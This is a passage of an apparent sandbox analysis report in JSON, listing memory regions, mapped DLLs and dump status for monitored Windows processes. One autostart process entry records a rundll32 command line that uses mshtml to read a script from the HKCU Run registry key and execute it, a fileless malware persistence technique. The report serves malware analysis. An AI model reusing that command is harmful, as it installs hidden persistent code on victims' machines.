"ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_646", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:47.497", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000647-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_647", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:47.497", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1187839, "entry_point": 0, "filename": null, "id": "region_648", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:00:47.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1960902656, "type": "region", "version": 1 }, "end_va": 1962598399, "entry_point": 1961092789, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_649", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1960902656, "timestamp": "00:00:47.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 1245184, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_650", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:00:47.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1318911, "entry_point": 0, "filename": null, "id": "region_651", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:47.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1983750143, "entry_point": 1971394049, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_652", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:47.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_653", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:47.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1425407, "entry_point": 1376256, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_654", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:00:47.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1474559, "entry_point": 1441792, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_655", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:00:47.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1572863, "entry_point": 1507328, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_656", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:00:47.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1960312832, "type": "region", "version": 1 }, "end_va": 1960591359, "entry_point": 1960403961, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_657", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1960312832, "timestamp": "00:00:47.533", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000658-addr_0x00000000001a0000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_658", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:00:47.536", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000659-addr_0x0000000000230000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_659", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:00:47.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1960181760, "type": "region", "version": 1 }, "end_va": 1960296447, "entry_point": 1960223793, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_660", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1960181760, "timestamp": "00:00:47.537", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1960116224, "type": "region", "version": 1 }, "end_va": 1960144895, "entry_point": 1960120973, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_661", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1960116224, "timestamp": "00:00:47.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1960099839, "entry_point": 1959859293, "filename": "\\Windows\\SysWOW64\\mswsock.dll", "id": "region_662", "name": "mswsock.dll", "norm_filename": "c:\\windows\\syswow64\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:00:47.547", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000663-addr_0x0000000004620000-size_0x0000000000190000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1638400, "start_va": 73531392, "type": "region", "version": 1 }, "end_va": 75169791, "entry_point": 0, "filename": null, "id": "region_663", "name": "private_0x0000000004620000", "norm_filename": null, "region_type": "private_memory", "start_va": 73531392, "timestamp": "00:00:47.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1959788544, "type": "region", "version": 1 }, "end_va": 1959809023, "entry_point": 1959794143, "filename": "\\Windows\\SysWOW64\\WSHTCPIP.DLL", "id": "region_664", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\syswow64\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1959788544, "timestamp": "00:00:47.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1959723008, "type": "region", "version": 1 }, "end_va": 1959788543, "entry_point": 1959737537, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_665", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1959723008, "timestamp": "00:00:47.552", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000666-addr_0x00000000047b0000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 75169792, "type": "region", "version": 1 }, "end_va": 77266943, "entry_point": 0, "filename": null, "id": "region_666", "name": "private_0x00000000047b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75169792, "timestamp": "00:00:47.554", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000667-addr_0x0000000000350000-size_0x0000000000050000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 327680, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_667", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:00:47.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1959657472, "type": "region", "version": 1 }, "end_va": 1959723007, "entry_point": 1959662886, "filename": "\\Windows\\SysWOW64\\NapiNSP.dll", "id": "region_668", "name": "napinsp.dll", "norm_filename": "c:\\windows\\syswow64\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1959657472, "timestamp": "00:00:47.555", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000669-addr_0x00000000044e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 72220672, "type": "region", "version": 1 }, "end_va": 72482815, "entry_point": 0, "filename": null, "id": "region_669", "name": "private_0x00000000044e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 72220672, "timestamp": "00:00:47.560", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000670-addr_0x0000000004660000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 73793536, "type": "region", "version": 1 }, "end_va": 74055679, "entry_point": 0, "filename": null, "id": "region_670", "name": "private_0x0000000004660000", "norm_filename": null, "region_type": "private_memory", "start_va": 73793536, "timestamp": "00:00:47.561", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000671-addr_0x0000000004770000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 74907648, "type": "region", "version": 1 }, "end_va": 75169791, "entry_point": 0, "filename": null, "id": "region_671", "name": "private_0x0000000004770000", "norm_filename": null, "region_type": "private_memory", "start_va": 74907648, "timestamp": "00:00:47.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1959526400, "type": "region", "version": 1 }, "end_va": 1959600127, "entry_point": 1959532786, "filename": "\\Windows\\SysWOW64\\pnrpnsp.dll", "id": "region_672", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\syswow64\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1959526400, "timestamp": "00:00:47.561", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000673-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_673", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:47.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1959460864, "type": "region", "version": 1 }, "end_va": 1959493631, "entry_point": 1959465758, "filename": "\\Windows\\SysWOW64\\winrnr.dll", "id": "region_674", "name": "winrnr.dll", "norm_filename": "c:\\windows\\syswow64\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1959460864, "timestamp": "00:00:47.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1959198720, "type": "region", "version": 1 }, "end_va": 1959428095, "entry_point": 1959237902, "filename": "\\Windows\\SysWOW64\\FWPUCLNT.DLL", "id": "region_675", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\syswow64\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1959198720, "timestamp": "00:00:47.566", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000676-addr_0x00000000049b0000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 77266944, "type": "region", "version": 1 }, "end_va": 79364095, "entry_point": 0, "filename": null, "id": "region_676", "name": "private_0x00000000049b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 77266944, "timestamp": "00:00:47.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959157759, "entry_point": 1959138482, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_677", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:00:47.575", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\rundll32.exe\" javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", "filename": "c:\\windows\\system32\\rundll32.exe", "id": "proc_5", "image_name": "rundll32.exe", "monitor_reason": "autostart", "monitored_id": 5, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "process_00000005-region_00000687-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_687", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:14.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_688", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:14.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_689", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:14.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_690", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:14.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007498752, "type": "region", "version": 1 }, "end_va": 2009239551, "entry_point": 2007498752, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_691", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007498752, "timestamp": "00:01:14.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_692", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:14.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000693-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_693", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:14.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 4288610304, "type": "region", "version": 1 }, "end_va": 4288671743, "entry_point": 4288610304, "filename": "\\Windows\\System32\\rundll32.exe", "id": "region_694", "name": "rundll32.exe", "norm_filename": "c:\\windows\\system32\\rundll32.exe", "region_type": "memory_mapped_file", "start_va": 4288610304, "timestamp": "00:01:14.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791795564544, "type": "region", "version": 1 }, "end_va": 8791795568639, "entry_point": 8791795564544, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_695", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791795564544, "timestamp": "00:01:14.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_696", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:14.353", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000697-addr_0x000007fffffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_697", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:14.353", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000698-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_698", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:14.354", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000831-addr_0x0000000000360000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_831", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:17.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006319104, "type": "region", "version": 1 }, "end_va": 2007494655, "entry_point": 2006319104, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_832", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2006319104, "timestamp": "00:01:17.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791760896000, "type": "region", "version": 1 }, "end_va": 8791761334271, "entry_point": 8791760896000, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_833", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791760896000, "timestamp": "00:01:17.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_834", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:17.515", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_835", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:17.515", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005270528, "type": "region", "version": 1 }, "end_va": 2006294527, "entry_point": 2005270528, "filename": "\\Windows\\System32\\user32.dll", "id": "region_836", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2005270528, "timestamp": "00:01:17.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_837", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:17.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_838", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791762010112, "type": "region", "version": 1 }, "end_va": 8791762661375, "entry_point": 8791762010112, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_839", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791762010112, "timestamp": "00:01:17.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791778328576, "type": "region", "version": 1 }, "end_va": 8791778750463, "entry_point": 8791778328576, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_840", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 